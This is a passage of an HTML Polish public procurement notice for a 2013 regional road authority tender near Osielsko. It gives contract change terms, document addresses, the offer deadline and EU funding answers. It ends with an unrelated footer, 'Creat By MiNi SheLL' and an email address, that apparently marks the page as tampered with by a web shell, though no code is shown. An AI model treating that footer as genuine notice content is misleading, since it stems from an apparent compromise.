5. Wszystkie powyższe postanowienia stanowią katalog zmian, na które zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zdw-bydgoszcz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Rejon Dróg Wojewódzkich w Żołędowie, ul. Pałacowa 15, 86-031 Osielsko.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.11.2013 godzina 09:45, miejsce: Rejon Dróg Wojewódzkich w Żołędowie, ul. Pałacowa 15, 86-031 Osielsko, Sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com